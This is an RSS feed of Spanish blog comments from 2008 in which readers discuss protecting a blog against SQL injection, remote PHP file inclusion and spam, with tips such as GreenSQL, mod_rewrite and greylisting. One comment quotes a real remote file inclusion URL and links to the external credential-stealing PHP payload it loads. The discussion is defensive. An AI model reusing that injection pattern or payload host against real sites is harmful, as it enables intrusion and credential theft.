<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comentarios en: Una de zombies</title>
	<atom:link href="http://www.bizzit.es/blog/?feed=rss2&#038;p=742" rel="self" type="application/rss+xml" />
	<link>http://www.bizzit.es/blog/?p=742</link>
	<description>Ingeniería del software y aplicaciones web</description>
	<lastBuildDate>Mon, 16 Aug 2010 16:25:18 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
	<item>
		<title>Por: Javier Jofre</title>
		<link>http://www.bizzit.es/blog/?p=742&#038;cpage=1#comment-8094</link>
		<dc:creator>Javier Jofre</dc:creator>
		<pubDate>Sat, 13 Sep 2008 09:14:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.balearsinnovacio.com/blog/?p=742#comment-8094</guid>
		<description>Por cierto, para el que le vaya a ser útil a causa de que tenga que trabajar o manejar bases de datos MySQL: &lt;a href=&quot;http://sentidoweb.com/2008/09/08/greensql-proxy-que-protege-mysql-de-sql-injections.php&quot; rel=&quot;nofollow&quot;&gt;GreenSQL&lt;/a&gt; es un proxy que protege a MySQL de las técnicas de SQL Injection.

Un saludo.</description>
		<content:encoded><![CDATA[<p>Por cierto, para el que le vaya a ser útil a causa de que tenga que trabajar o manejar bases de datos MySQL: <a href="http://sentidoweb.com/2008/09/08/greensql-proxy-que-protege-mysql-de-sql-injections.php" rel="nofollow">GreenSQL</a> es un proxy que protege a MySQL de las técnicas de SQL Injection.</p>
<p>Un saludo.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Javier Jofre</title>
		<link>http://www.bizzit.es/blog/?p=742&#038;cpage=1#comment-7424</link>
		<dc:creator>Javier Jofre</dc:creator>
		<pubDate>Thu, 21 Aug 2008 09:00:51 +0000</pubDate>
		<guid isPermaLink="false">http://www.balearsinnovacio.com/blog/?p=742#comment-7424</guid>
		<description>Efectivamente, otra forma que circula por internet es mediante la modificación del archivo .htaccess.

Un saludo.</description>
		<content:encoded><![CDATA[<p>Efectivamente, otra forma que circula por internet es mediante la modificación del archivo .htaccess.</p>
<p>Un saludo.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Makj</title>
		<link>http://www.bizzit.es/blog/?p=742&#038;cpage=1#comment-7400</link>
		<dc:creator>Makj</dc:creator>
		<pubDate>Wed, 20 Aug 2008 11:45:28 +0000</pubDate>
		<guid isPermaLink="false">http://www.balearsinnovacio.com/blog/?p=742#comment-7400</guid>
		<description>un posible workaround para solucionar parcialmente el problema es usar el mod_rewrite de apache, eso te permitiria evitar direcciones en las que haya URLs incrustadas con parametros...</description>
		<content:encoded><![CDATA[<p>un posible workaround para solucionar parcialmente el problema es usar el mod_rewrite de apache, eso te permitiria evitar direcciones en las que haya URLs incrustadas con parametros&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Carlos A. García</title>
		<link>http://www.bizzit.es/blog/?p=742&#038;cpage=1#comment-7392</link>
		<dc:creator>Carlos A. García</dc:creator>
		<pubDate>Wed, 20 Aug 2008 06:26:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.balearsinnovacio.com/blog/?p=742#comment-7392</guid>
		<description>OK. Lo que nos queda es solucionar el tema de los scripts php. Aparecen como visitas normales a nuestro blog, pero pasando como parámetro un fichero que está locaizado en un ordenador zombi. Este fichero es un php que intenta obtener nuestro nombre de usuario, password, etc.
La url con la que acceden a nosotros es, por ejemplo:
http://www.balearsinnovacio.com/blog/?p=153/apps/apps.php?app=http://warsector.ru/access2006.log
Si tienes uriosidad por ver el php que nos intentan inyectar, sigue el hilo y mira: http://warsector.ru/access2006.log
Ejem ... esto es una demostración más de que cualquier legislación sobre internet no es más que un patético intento de ponerle puertas al campo. ¿Alguien sabe como comunicarnos con los rusos para reportarles el incidente?
Saludos</description>
		<content:encoded><![CDATA[<p>OK. Lo que nos queda es solucionar el tema de los scripts php. Aparecen como visitas normales a nuestro blog, pero pasando como parámetro un fichero que está locaizado en un ordenador zombi. Este fichero es un php que intenta obtener nuestro nombre de usuario, password, etc.<br />
La url con la que acceden a nosotros es, por ejemplo:<br />
<a href="http://www.balearsinnovacio.com/blog/?p=153/apps/apps.php?app=http://warsector.ru/access2006.log" rel="nofollow">http://www.balearsinnovacio.com/blog/?p=153/apps/apps.php?app=http://warsector.ru/access2006.log</a><br />
Si tienes uriosidad por ver el php que nos intentan inyectar, sigue el hilo y mira: <a href="http://warsector.ru/access2006.log" rel="nofollow">http://warsector.ru/access2006.log</a><br />
Ejem &#8230; esto es una demostración más de que cualquier legislación sobre internet no es más que un patético intento de ponerle puertas al campo. ¿Alguien sabe como comunicarnos con los rusos para reportarles el incidente?<br />
Saludos</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Makj</title>
		<link>http://www.bizzit.es/blog/?p=742&#038;cpage=1#comment-7391</link>
		<dc:creator>Makj</dc:creator>
		<pubDate>Wed, 20 Aug 2008 06:07:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.balearsinnovacio.com/blog/?p=742#comment-7391</guid>
		<description>contra el SPAM hay una estrategia muy ingeniosa que permite eliminar entre el 90% y el 100% del SPAM entrante en un servidor de correo, eso si, el coste de esta solucion es un retardo en la entrega de los mensajes.
la solucion pasa por incluir un filtro de greylisting a la entrada de nuestro servidor, y a continuacion el tipico filtro antispam para los que se puedan &quot;colar&quot; por el primero.
yo era muy esceptico respecto de esta solucion cuando la encontre por ahi, pero la verdad es que funciona increiblemente bien, mucho mejor de lo esperado: el primer filtro elimina alrededor del 90% del posible SPAM, quitando mucho trabajo a nuestro filtro, que si esta bien configurado nos eliminara el resto del SPAM.
seguramente este sistema tambien tiene sus puntos debiles, pero seguro que son mucho mas fuertes que sin todo esto</description>
		<content:encoded><![CDATA[<p>contra el SPAM hay una estrategia muy ingeniosa que permite eliminar entre el 90% y el 100% del SPAM entrante en un servidor de correo, eso si, el coste de esta solucion es un retardo en la entrega de los mensajes.<br />
la solucion pasa por incluir un filtro de greylisting a la entrada de nuestro servidor, y a continuacion el tipico filtro antispam para los que se puedan &#8220;colar&#8221; por el primero.<br />
yo era muy esceptico respecto de esta solucion cuando la encontre por ahi, pero la verdad es que funciona increiblemente bien, mucho mejor de lo esperado: el primer filtro elimina alrededor del 90% del posible SPAM, quitando mucho trabajo a nuestro filtro, que si esta bien configurado nos eliminara el resto del SPAM.<br />
seguramente este sistema tambien tiene sus puntos debiles, pero seguro que son mucho mas fuertes que sin todo esto</p>
]]></content:encoded>
	</item>
</channel>
</rss>
